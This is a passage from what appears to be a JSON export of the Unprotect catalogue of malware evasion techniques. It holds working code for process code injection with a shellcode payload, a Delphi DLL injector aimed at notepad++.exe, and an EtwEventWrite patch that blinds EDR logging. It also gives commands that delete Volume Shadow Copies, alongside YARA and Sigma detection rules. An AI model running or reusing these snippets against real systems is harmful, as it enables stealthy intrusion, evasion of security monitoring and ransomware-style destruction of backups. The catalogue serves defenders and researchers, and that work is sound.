0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// create a 
thread that calls Sleep(0) to initialise the environment strings in the PEB\r\n\tif(NtCreateThreadEx(&hThread, 0x001FFFFF, NULL, ProcessInfo.hProcess, Sleep, (LPVOID)0, 0, NULL, 0, 0, NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to create Sleep thread in remote process\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\tCloseHandle(hThread);\r\n\r\n\t// read RtlUserProcessParameters ptr from PEB\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, (void*)(ProcessBasicInfoData.PebBaseAddress + 0x10), (void*)&pRemotePtr_RtlUserProcessParameters, sizeof(BYTE*), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read RtlUserProcessParameters value from PEB\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// read EnvironmentStr ptr from RtlUserProcessParameters\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, (void*)(pRemotePtr_RtlUserProcessParameters + 0x48), (void*)&pRemotePtr_EnvironmentStr, sizeof(BYTE*), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read EnvironmentStr value from RtlUserProcessParameters\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// update environment string ptr to ignore the original bytes\r\n\tpRemotePtr_EnvironmentStr += dwOrigEnvBlockTotalLengthBytes;\r\n\r\n\t// read EnvironmentStr value\r\n\tmemset(bLoaderCode_Copy, 0, sizeof(bLoaderCode_Copy));\r\n\tif(ReadProcessMemory(ProcessInfo.hProcess, (void*)pRemotePtr_EnvironmentStr, (void*)bLoaderCode_Copy, sizeof(bGlobal_LoaderCode), NULL) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to read loader data from 
EnvironmentStr\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// ensure the loader code has been copied correctly\r\n\tif(memcmp(bLoaderCode_Copy, bGlobal_LoaderCode, sizeof(bGlobal_LoaderCode)) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Invalid loader data\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Executing code in remote process...\\n\");\r\n\r\n\t// temporarily make the loader code executable\r\n\tif(VirtualProtectEx(ProcessInfo.hProcess, pRemotePtr_EnvironmentStr, sizeof(bGlobal_LoaderCode), PAGE_EXECUTE_READWRITE, &dwOriginalProtect) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to update memory protection\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// execute payload\r\n\tif(NtCreateThreadEx(&hThread, 0x001FFFFF, NULL, ProcessInfo.hProcess, (BYTE*)(pRemotePtr_EnvironmentStr + LOADER_CODE_OFFSET), (LPVOID)0, 0, NULL, 0, 0, NULL) != 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to create code loader thread in remote process\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\tWaitForSingleObject(hThread, INFINITE);\r\n\tCloseHandle(hThread);\r\n\r\n\t// restore original protection value\r\n\tif(VirtualProtectEx(ProcessInfo.hProcess, pRemotePtr_EnvironmentStr, sizeof(bGlobal_LoaderCode), dwOriginalProtect, &dwTempProtect) == 0)\r\n\t{\r\n\t\tprintf(\"Error: Failed to update memory protection\\n\");\r\n\r\n\t\t// error\r\n\t\tTerminateProcess(ProcessInfo.hProcess, 
0);\r\n\t\tCloseHandle(ProcessInfo.hThread);\r\n\t\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// resume main thread\r\n\tResumeThread(ProcessInfo.hThread);\r\n\r\n\t// close handles\r\n\tCloseHandle(ProcessInfo.hThread);\r\n\tCloseHandle(ProcessInfo.hProcess);\r\n\r\n\treturn 0;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tchar *pExePath = NULL;\r\n\r\n\tBYTE bPayload[] =\r\n\t{\r\n\t\t// string: <user32.dll>\r\n\t\t// push 0x00006C6C\r\n\t\t0x68, 0x6C, 0x6C, 0x00, 0x00,\r\n\t\t// push 0x642E3233\r\n\t\t0x68, 0x33, 0x32, 0x2E, 0x64,\r\n\t\t// push 0x72657375\r\n\t\t0x68, 0x75, 0x73, 0x65, 0x72,\r\n\t\t// mov ecx, esp\r\n\t\t0x8B, 0xCC,\r\n\t\t// push ecx (ModuleName)\r\n\t\t0x51,\r\n\t\t// mov eax, LoadLibraryA\r\n\t\t0xB8, 0x44, 0x33, 0x22, 0x11,\r\n\t\t// call eax\r\n\t\t0xFF, 0xD0,\r\n\r\n\t\t // string: <Code injected successfully!>\r\n\t\t// push 0x0021796C\r\n\t\t0x68, 0x6C, 0x79, 0x21, 0x00,\r\n\t\t// push 0x6C756673\r\n\t\t0x68, 0x73, 0x66, 0x75, 0x6C,\r\n\t\t// push 0x73656363\r\n\t\t0x68, 0x63, 0x63, 0x65, 0x73,\r\n\t\t// push 0x75732064\r\n\t\t0x68, 0x64, 0x20, 0x73, 0x75,\r\n\t\t// push 0x65746365\r\n\t\t0x68, 0x65, 0x63, 0x74, 0x65,\r\n\t\t// push 0x6A6E6920\r\n\t\t0x68, 0x20, 0x69, 0x6E, 0x6A,\r\n\t\t// push 0x65646F43\r\n\t\t0x68, 0x43, 0x6F, 0x64, 0x65,\r\n\t\t// mov ecx, esp\r\n\t\t0x8B, 0xCC,\r\n\t\t// string: <www.x86matthew.com>\r\n\t\t// push 0x00006D6F\r\n\t\t0x68, 0x6F, 0x6D, 0x00, 0x00,\r\n\t\t// push 0x632E7765\r\n\t\t0x68, 0x65, 0x77, 0x2E, 0x63,\r\n\t\t// push 0x68747461\r\n\t\t0x68, 0x61, 0x74, 0x74, 0x68,\r\n\t\t// push 0x6D363878\r\n\t\t0x68, 0x78, 0x38, 0x36, 0x6D,\r\n\t\t// push 0x2E777777\r\n\t\t0x68, 0x77, 0x77, 0x77, 0x2E,\r\n\t\t// mov ebx, esp\r\n\t\t0x8B, 0xDC,\r\n\t\t// push MB_OK\r\n\t\t0x6A, 0x00,\r\n\t\t// push ebx (Caption)\r\n\t\t0x53,\r\n\t\t// push ecx (Text)\r\n\t\t0x51,\r\n\t\t// push hWnd\r\n\t\t0x6A, 0x00,\r\n\t\t// mov eax, MessageBoxA\r\n\t\t0xB8, 0x44, 0x33, 0x22, 
0x11,\r\n\t\t// call eax\r\n\t\t0xFF, 0xD0,\r\n\r\n\t\t// add esp, 0x3C\r\n\t\t0x83, 0xC4, 0x3C,\r\n\r\n\t\t// ret\r\n\t\t0xC3\r\n\t};\r\n\r\n\t// set function addresses\r\n\t*(DWORD*)&bPayload[19] = (DWORD)LoadLibraryA;\r\n\t*(DWORD*)&bPayload[96] = (DWORD)MessageBoxA;\r\n\r\n\tprintf(\"ProcEnvInjection - www.x86matthew.com\\n\\n\");\r\n\r\n\t// check params\r\n\tif(argc != 2)\r\n\t{\r\n\t\tprintf(\"Usage: %s [exe_path]\\n\\n\", argv[0]);\r\n\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// get cmd param\r\n\tpExePath = argv[1];\r\n\t\r\n\t// get NtQueryInformationProcess function\r\n\tNtQueryInformationProcess = (unsigned long (__stdcall *)(void *,unsigned long,void *,unsigned long,unsigned long *))GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtQueryInformationProcess\");\r\n\tif(NtQueryInformationProcess == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// get NtCreateThreadEx function\r\n\tNtCreateThreadEx = (unsigned long (__stdcall *)(void ** ,unsigned long,void *,void *,void *,void *,unsigned long,unsigned long *,unsigned long,unsigned long,void *))GetProcAddress(GetModuleHandle(\"ntdll.dll\"), \"NtCreateThreadEx\");\r\n\tif(NtCreateThreadEx == NULL)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\t// start target process\r\n\tif(StartInjectedProcess(pExePath, bPayload, sizeof(bPayload)) != 0)\r\n\t{\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tprintf(\"Injected successfully\\n\");\r\n\r\n\treturn 0;\r\n}"
                },
                {
                    "id": 80,
                    "language": {
                        "id": 1,
                        "label": "Delphi",
                        "code_class": "Delphi"
                    },
                    "author": {
                        "id": 1,
                        "name": "Jean-Pierre LESUEUR",
                        "email": "jplesueur@phrozen.io",
                        "linkedin": "https://www.linkedin.com/in/jlesueur/",
                        "twitter": "https://www.twitter.com/darkcodersc",
                        "website": "https://www.phrozen.io/",
                        "github": "https://github.com/DarkCoderSc"
                    },
                    "technique": "https://unprotect.it/api/techniques/178/",
                    "description": "This code snippet demonstrates how to inject a DLL into a remote process without using `WriteProcessMemory` or `VirtualAlloc(Ex)`.",
                    "plain_code": "(*\r\n    Example of DLL Code to test DLL Injection:\r\n    ------------------------------------------\r\n\r\n    BOF>>\r\n\r\n    library UnprotectTestDLL;\r\n\r\n          uses\r\n            WinApi.Windows,\r\n            System.SysUtils,\r\n            System.Classes;\r\n\r\n          {$R *.res}\r\n\r\n          procedure DllMain(AReason: Integer);\r\n          var AMessage   : String;\r\n              AStrReason : String;\r\n          begin\r\n            case AReason of\r\n              DLL_PROCESS_DETACH : AStrReason := 'DLL_PROCESS_DETACH';\r\n              DLL_PROCESS_ATTACH : AStrReason := 'DLL_PROCESS_ATTACH';\r\n              DLL_THREAD_ATTACH  : AStrReason := 'DLL_THREAD_ATTACH';\r\n              DLL_THREAD_DETACH  : AStrReason := 'DLL_THREAD_DETACH';\r\n              else\r\n                AStrReason := 'REASON_UNKNOWN';\r\n            end;\r\n\r\n            AMessage := Format('(%s): Injected! Living in %d (%s) process.', [\r\n              AStrReason,\r\n              GetCurrentProcessId(),\r\n              ExtractFileName(GetModuleName(0))\r\n            ]);\r\n            ///\r\n\r\n            OutputDebugStringW(PWideChar(AMessage));\r\n          end;\r\n\r\n          begin\r\n            DllProc := DllMain;\r\n            DllMain(DLL_PROCESS_ATTACH)\r\n\r\n\r\n    <<EOF\r\n*)\r\n\r\n// Support both x86-32 and x86-64\r\n\r\nprogram ProcEnvInjection_DLLInjection;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n  Winapi.Windows,\r\n  System.Math,\r\n  System.SysUtils;\r\n\r\ntype\r\n  EWindowsException = class(Exception)\r\n  private\r\n    FLastError : Integer;\r\n  public\r\n    {@C}\r\n    constructor Create(const WinAPI : String); overload;\r\n\r\n    {@G}\r\n    property LastError : Integer read FLastError;\r\n  end;\r\n\r\n  {$IFDEF WIN64}\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : Int64;\r\n    PebBaseAddress  
   : Pointer;\r\n    AffinityMask       : Int64;\r\n    BasePriority       : Int64;\r\n    UniqueProcessId    : Int64;\r\n    InheritedUniquePID : Int64;\r\n    end;\r\n  {$ELSE}\r\n    PProcessBasicInformation = ^TProcessBasicInformation;\r\n    TProcessBasicInformation = record\r\n    ExitStatus         : DWORD;\r\n    PebBaseAddress     : Pointer;\r\n    AffinityMask       : DWORD;\r\n    BasePriority       : DWORD;\r\n    UniqueProcessId    : DWORD;\r\n    InheritedUniquePID : DWORD;\r\n    end;\r\n  {$ENDIF}\r\n\r\n  UNICODE_STRING = record\r\n    Length        : Word;\r\n    MaximumLength : Word;\r\n    Buffer        : LPWSTR;\r\n  end;\r\n\r\n  CURDIR = record\r\n    DosPath : UNICODE_STRING;\r\n    Handle  : THandle;\r\n  end;\r\n\r\n  RTL_DRIVE_LETTER_CURDIR = record\r\n    Flags     : Word;\r\n    Length    : Word;\r\n    TimeStamp : ULONG;\r\n    DosPath   : UNICODE_STRING;\r\n  end;\r\n\r\n  TRTLUserProcessParameters = record\r\n    MaximumLength      : ULONG;\r\n    Length             : ULONG;\r\n    Flags              : ULONG;\r\n    DebugFlags         : ULONG;\r\n    ConsoleHandle      : THANDLE;\r\n    ConsoleFlags       : ULONG;\r\n    StandardInput      : THANDLE;\r\n    StandardOutput     : THANDLE;\r\n    StandardError      : THANDLE;\r\n    CurrentDirectory   : CURDIR;\r\n    DllPath            : UNICODE_STRING;\r\n    ImagePathName      : UNICODE_STRING;\r\n    CommandLine        : UNICODE_STRING;\r\n    Environment        : Pointer;\r\n    StartingX          : ULONG;\r\n    StartingY          : ULONG;\r\n    CountX             : ULONG;\r\n    CountY             : ULONG;\r\n    CountCharsX        : ULONG;\r\n    CountCharsY        : ULONG;\r\n    FillAttribute      : ULONG;\r\n    WindowFlags        : ULONG;\r\n    ShowWindowFlags    : ULONG;\r\n    WindowTitle        : UNICODE_STRING;\r\n    DesktopInfo        : UNICODE_STRING;\r\n    ShellInfo          : UNICODE_STRING;\r\n    RuntimeData        : UNICODE_STRING;\r\n    CurrentDirectories : 
array [0 .. 32-1] of RTL_DRIVE_LETTER_CURDIR;\r\n  end;\r\n  PRTLUserProcessParameters = ^TRTLUserProcessParameters;\r\n\r\n  TPEB = record\r\n    Reserved1              : array [0..2-1] of Byte;\r\n    BeingDebugged          : Byte;\r\n    Reserved2              : Byte;\r\n    Reserved3              : array [0..2-1] of Pointer;\r\n    Ldr                    : Pointer;\r\n    ProcessParameters      : PRTLUserProcessParameters;\r\n    Reserved4              : array [0..103-1] of Byte;\r\n    Reserved5              : array [0..52-1] of Pointer;\r\n    PostProcessInitRoutine : Pointer;\r\n    Reserved6              : array [0..128-1] of byte;\r\n    Reserved7              : Pointer;\r\n    SessionId              : ULONG;\r\n  end;\r\n  PPEB = ^TPEB;\r\n\r\nfunction NtQueryInformationProcess(\r\n  ProcessHandle : THandle;\r\n  ProcessInformationClass : DWORD;\r\n  ProcessInformation : Pointer;\r\n  ProcessInformationLength : ULONG;\r\n  ReturnLength : PULONG\r\n): LongInt; stdcall; external 'ntdll.dll';\r\n\r\nconst PROCESS_BASIC_INFORMATION = 0;\r\n\r\nconstructor EWindowsException.Create(const WinAPI : String);\r\nvar AFormatedMessage : String;\r\nbegin\r\n  FLastError := GetLastError();\r\n\r\n  AFormatedMessage := Format('___%s: last_err=%d, last_err_msg=\"%s\".', [\r\n      WinAPI,\r\n      FLastError,\r\n      SysErrorMessage(FLastError)\r\n  ]);\r\n\r\n  ///\r\n  inherited Create(AFormatedMessage);\r\nend;\r\n\r\nfunction RandomString(ALength : Word) : String;\r\nconst AChars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';\r\nvar I : Integer;\r\nbegin\r\n  result := '';\r\n  ///\r\n\r\n  randomize;\r\n\r\n  for I := 1 to ALength do begin\r\n      result := result + AChars[random(length(AChars))+1];\r\n  end;\r\nend;\r\n\r\n\r\nfunction InjectDLL(const ADLLPath : String; AHostApplication: String; const AEggLength : Cardinal = 5) : Boolean;\r\nvar AStartupInfo              : TStartupInfo;\r\n    AProcessInfo              : 
TProcessInformation;\r\n    AEnvLen                   : Cardinal;\r\n    pEnvBlock                 : Pointer;\r\n    ARetLen                   : Cardinal;\r\n    PBI                       : TProcessBasicInformation;\r\n    APEB                      : TPEB;\r\n    ABytesRead                : SIZE_T;\r\n    ARTLUserProcessParameters : TRTLUserProcessParameters;\r\n    i                         : Integer;\r\n    pOffset                   : Pointer;\r\n    APayloadEgg               : String;\r\n    APayloadEnv               : String;\r\n    ABuffer                   : array of byte;\r\n    pPayloadOffset            : Pointer;\r\n    AThreadId                 : Cardinal;\r\nbegin\r\n  ZeroMemory(@AStartupInfo, SizeOf(TStartupInfo));\r\n  AStartupInfo.cb := SizeOf(TStartupInfo);\r\n\r\n  ZeroMemory(@AProcessInfo, SizeOf(TProcessInformation));\r\n\r\n  result := False;\r\n\r\n  APayloadEgg := RandomString(AEggLength);\r\n  APayloadEnv := Format('%s=%s', [APayloadEgg, ADLLPath]);\r\n\r\n  AEnvLen := (Length(APayloadEnv) * SizeOf(WideChar));\r\n\r\n  GetMem(pEnvBlock, AEnvLen);\r\n  try\r\n    ZeroMemory(pEnvBlock, AEnvLen);\r\n    Move(PWideChar(APayloadEnv)^, pEnvBlock^, AEnvLen);\r\n    ///\r\n\r\n    UniqueString(AHostApplication);\r\n\r\n    if not CreateProcessW(\r\n        PWideChar(AHostApplication),\r\n        nil,\r\n        nil,\r\n        nil,\r\n        False,\r\n        CREATE_NEW_CONSOLE or CREATE_UNICODE_ENVIRONMENT,\r\n        pEnvBlock,\r\n        nil,\r\n        AStartupInfo,\r\n        AProcessInfo\r\n    ) then\r\n      raise EWindowsException.Create('CreateProcessW');\r\n\r\n    // Tiny trick to be sure the new process is completely initialized.\r\n    // Remove the line below if you find it problematic.\r\n    WaitForInputIdle(AProcessInfo.hProcess, INFINITE);\r\n\r\n    if NtQueryInformationProcess(\r\n        AProcessInfo.hProcess,\r\n        PROCESS_BASIC_INFORMATION,\r\n        @PBI,\r\n        SizeOf(TProcessBasicInformation),\r\n        @ARetLen\r\n    ) <> 
ERROR_SUCCESS then\r\n      raise EWindowsException.Create('NtQueryInformationProcess');\r\n\r\n    if not ReadProcessMemory(\r\n        AProcessInfo.hProcess,\r\n        PBI.PebBaseAddress,\r\n        @APEB,\r\n        SizeOf(TPEB),\r\n        ABytesRead\r\n    ) then\r\n      raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n    if not ReadProcessMemory(\r\n        AProcessInfo.hProcess,\r\n        APEB.ProcessParameters,\r\n        @ARTLUserProcessParameters,\r\n        SizeOf(TRTLUserProcessParameters),\r\n        ABytesRead\r\n    ) then\r\n      raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n    // Scan Environment Variable Memory Block\r\n    I := 0;\r\n\r\n    SetLength(ABuffer, AEggLength * SizeOf(WideChar));\r\n\r\n    pPayloadOffset := nil;\r\n\r\n    while true do begin\r\n      pOffset := Pointer(NativeUInt(ARTLUserProcessParameters.Environment) + I);\r\n      ///\r\n\r\n      if not ReadProcessMemory(\r\n          AProcessInfo.hProcess,\r\n          pOffset,\r\n          @ABuffer[0],\r\n          Length(ABuffer),\r\n          ABytesRead\r\n      ) then\r\n        raise EWindowsException.Create('ReadProcessMemory');\r\n\r\n      if CompareMem(PWideChar(ABuffer), PWideChar(APayloadEgg), Length(ABuffer)) then begin\r\n        pPayloadOffset := Pointer(NativeUInt(pOffset) + Length(ABuffer) + SizeOf(WideChar) { =\\0 });\r\n\r\n        break;\r\n      end;\r\n\r\n      Inc(I, 2);\r\n    end;\r\n\r\n    SetLength(ABuffer, 0);\r\n\r\n    if not Assigned(pPayloadOffset) then\r\n      raise Exception.Create('Could not locate Injected DLL Path offset from remote process environment.');\r\n\r\n    // Debug, read DLL path from remote process\r\n//    SetLength(ABuffer, AEnvLen - (5 * SizeOf(WideChar)));\r\n//    ReadProcessMemory(\r\n//        AProcessInfo.hProcess,\r\n//        pPayloadOffset,\r\n//        @ABuffer[0],\r\n//        Length(ABuffer),\r\n//        ABytesRead\r\n//    );\r\n//    WriteLn(PWideChar(ABuffer));\r\n\r\n    // Start 
DLL Injection\r\n    if CreateRemoteThread(\r\n        AProcessInfo.hProcess,\r\n        nil,\r\n        0,\r\n        GetProcAddress(GetModuleHandle('Kernel32.dll'), 'LoadLibraryW'),\r\n        pPayloadOffset,\r\n        0,\r\n        AThreadId\r\n    ) = 0 then\r\n      raise EWindowsException.Create('CreateRemoteThread');\r\n  finally\r\n    FreeMem(pEnvBlock, AEnvLen);\r\n  end;\r\nend;\r\n\r\nbegin\r\n  try\r\n    InjectDLL('C:\\Temp\\UnprotectTestDLL.dll', 'C:\\Program Files\\Notepad++\\notepad++.exe');\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
                }
            ],
            "detection_rules": []
        },
        {
            "id": 177,
            "unprotect_id": "U0306",
            "name": "Disabling Event Tracing for Windows (ETW)",
            "categories": [
                {
                    "id": 8,
                    "key": "anti-forensic",
                    "label": "Anti-Forensic"
                }
            ],
            "description": "Many EDR solutions leverage Event Tracing for Windows (ETW) extensively. ETW allows for extensive instrumentation and tracing of a process's functionality and WINAPI calls. It has components in the kernel, which register callbacks for system calls and other kernel operations, but it also consists of a userland component that is part of ntdll.dll. \r\n\r\nSince ntdll.dll is a DLL loaded into the process of a binary, an attacker has full control over this DLL and therefore over the ETW functionality. The most common bypass technique is patching the function EtwEventWrite, which is called to write/log ETW events. It is possible to fetch its address in ntdll.dll and replace its first instructions with instructions that return 0 (SUCCESS).",
            "resources": "https://vanmieghem.io/blueprint-for-evading-edr-in-2022/",
            "tags": "anti-forensic",
            "snippets": [
                {
                    "id": 73,
                    "language": {
                        "id": 2,
                        "label": "C++",
                        "code_class": "cpp"
                    },
                    "author": {
                        "id": 3,
                        "name": "Unprotect",
                        "email": null,
                        "linkedin": null,
                        "twitter": "https://twitter.com/hashtag/unprotectproject",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/177/",
                    "description": "Snippet source code from @_vivami",
                    "plain_code": "void disableETW(void) {\r\n\t// return 0\r\n\tunsigned char patch[] = { 0x48, 0x33, 0xc0, 0xc3};     // xor rax, rax; ret\r\n\t\r\n\tULONG oldprotect = 0;\r\n\tsize_t size = sizeof(patch);\r\n\t\r\n\tHANDLE hCurrentProc = GetCurrentProcess();\r\n\t\r\n\tunsigned char sEtwEventWrite[] = { 'E','t','w','E','v','e','n','t','W','r','i','t','e', 0x0 };\r\n\t\r\n\tvoid *pEventWrite = GetProcAddress(GetModuleHandle((LPCSTR) sNtdll), (LPCSTR) sEtwEventWrite);\r\n\t\r\n\tNtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, PAGE_READWRITE, &oldprotect);\r\n\t\r\n\tmemcpy(pEventWrite, patch, size / sizeof(patch[0]));\r\n\t\r\n\tNtProtectVirtualMemory(hCurrentProc, &pEventWrite, (PSIZE_T) &size, oldprotect, &oldprotect);\r\n\tFlushInstructionCache(hCurrentProc, pEventWrite, size);\r\n\t\r\n}"
                }
            ],
            "detection_rules": []
        },
        {
            "id": 176,
            "unprotect_id": "U1008",
            "name": "Anti-UPX Unpacking",
            "categories": [
                {
                    "id": 14,
                    "key": "others",
                    "label": "Others"
                }
            ],
            "description": "Anti-UPX Unpacking is a technique to prevent malware from being unpacked by tools like UPX. A UPX-packed binary can be recognised by section names starting with UPX followed by a number (UPX0 and UPX1) and the string “UPX!” at the end of the PE header. This UPX reference structure is located at the end of the PE header and includes checksums, packed and unpacked sizes, and compression details.\r\n\r\nSeveral methods of preventing unpacking with \"upx -d\" have been known for a long time.\r\n\r\nOne easy way is to rename the sections to different strings. The normal section names of a UPX-packed binary are \"UPX0\", \"UPX1\" .. and \".rsrc\". In this case the unpacking command \"upx -d\" raises the exception \"CantUnpackException: file is possibly modified/hacked/protected; take care!\" and unpacking fails.\r\n\r\nAnother method is zero-padding any size or checksum fields in the UPX reference structure. In this case \"upx -d\" raises the exception \"CantUnpackException: header corrupted\" and unpacking fails.",
            "resources": "https://github.com/upx/upx/blob/master/src/stub/src/include/header.S\r\nhttps://bsodtutorials.wordpress.com/2014/11/14/upx-packing-and-anti-packing-techniques/\r\nhttps://blogs.jpcert.or.jp/en/2022/03/anti_upx_unpack.html\r\nhttps://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/\r\nhttps://www.akamai.com/blog/security/upx-packed-headaches",
            "tags": "antiUPX",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 50,
                    "key": "yara_packer_antiunpack",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_PACKER_antiunpack",
                    "rule": "rule upx_antiunpack_pe {\r\n     meta:\r\n        description = \"Anti-UPX Unpacking technique about section renaming and zero padding against upx reference structure\"\r\n        author = \"hackeT\"\r\n\r\n    strings:\r\n        $mz = \"MZ\"\r\n\r\n        $upx0 = {55 50 58 30 00 00 00}  //section name UPX0\r\n        $upx1 = {55 50 58 31 00 00 00}  //section name UPX1\r\n        $upx_sig = \"UPX!\"               //UPX_MAGIC_LE32\r\n        $upx_sig2 = {A1 D8 D0 D5}       //UPX_MAGIC2_LE32\r\n        $zero = {00 00 00 00}\r\n\r\n    condition:\r\n        $mz at 0 and ( $upx_sig at 992 or $upx_sig2 at 992 )\r\n        and \r\n        ( \r\n          not ($upx0 in (248..984) or $upx1 in (248..984)) // section renaming: 248 is the minimum offset after pe optional header.\r\n        or \r\n          $zero in (992..1024)                             // zero padding against upx reference structure: pe header ends offset 1024.\r\n        )\r\n}"
                }
            ]
        },
        {
            "id": 175,
            "unprotect_id": "U0305,T1070.004",
            "name": "Volume Shadow Copy Service (VSC,VSS) Deletion",
            "categories": [
                {
                    "id": 8,
                    "key": "anti-forensic",
                    "label": "Anti-Forensic"
                },
                {
                    "id": 10,
                    "key": "Defense-Evasion-Mitre",
                    "label": "Defense Evasion [Mitre]"
                }
            ],
            "description": "Deleting Volume Shadow Copies makes forensic investigation harder, because earlier versions of artifacts can no longer be recovered from them. Ransomware operators also commonly delete VSCs so that the original versions of the encrypted files cannot be restored from a shadow copy. \r\n\r\nDeletion via vssadmin or WMIC, however, happens at the file-system level: the actual data remains in the clusters on disk, so it may still be recoverable from the VSC until other files overwrite those clusters.",
            "resources": "https://docs.microsoft.com/ja-jp/windows-server/administration/windows-commands/vssadmin-delete-shadows\r\nhttps://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods\r\nhttps://blogs.blackberry.com/en/2018/11/threat-spotlight-inside-vssdestroy-ransomware\r\nhttps://blog.avast.com/zepto-ransomware-now-introduces-new-features-to-better-encrypt-your-files\r\nhttp://www.kazamiya.net/DeletedSC\r\nhttps://github.com/mnrkbys/vss_carver\r\nhttps://www.shadowexplorer.com/",
            "tags": "VSC,ShadowCopy,Ransomware",
            "snippets": [
                {
                    "id": 71,
                    "language": {
                        "id": 7,
                        "label": "cmd",
                        "code_class": "cmd"
                    },
                    "author": {
                        "id": 15,
                        "name": "hackeT",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/tatsuya-hasegawa-aa3279142/",
                        "twitter": "https://twitter.com/T_8ase",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/175/",
                    "description": "",
                    "plain_code": "vssadmin.exe delete shadows /all /quiet\r\nwmic shadowcopy delete /nointeractive\r\nvssadmin resize shadowstorage /for= /on= /maxsize="
                },
                {
                    "id": 72,
                    "language": {
                        "id": 8,
                        "label": "PowerShell",
                        "code_class": "PowerShell"
                    },
                    "author": {
                        "id": 15,
                        "name": "hackeT",
                        "email": null,
                        "linkedin": "https://www.linkedin.com/in/tatsuya-hasegawa-aa3279142/",
                        "twitter": "https://twitter.com/T_8ase",
                        "website": null,
                        "github": null
                    },
                    "technique": "https://unprotect.it/api/techniques/175/",
                    "description": "",
                    "plain_code": "Get-WmiObject Win32_ShadowCopy | % { $_.Delete() }\r\nGet-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete(); }\r\nGet-WmiObject Win32_ShadowCopy | Remove-WmiObject"
                }
            ],
            "detection_rules": [
                {
                    "id": 33,
                    "key": "sigma_delete_shadow_copy",
                    "type": {
                        "id": 3,
                        "name": "SIGMA",
                        "syntax_lang": "yaml"
                    },
                    "name": "SIGMA_delete_shadow_copy",
                    "rule": "title: Delete Shadow Copy Via Powershell\r\nstatus: experimental\r\ndescription: Delete Shadow Copy Via Powershell\r\nauthor: Joe Security\r\ndate: 2019-10-25\r\nid: 200011\r\nthreatname:\r\nbehaviorgroup: 18\r\nclassification: 8\r\nmitreattack: T1490\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:      \r\n          CommandLine:\r\n              - '*powershell*RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==*'\r\n      condition: selection\r\nlevel: critical"
                },
                {
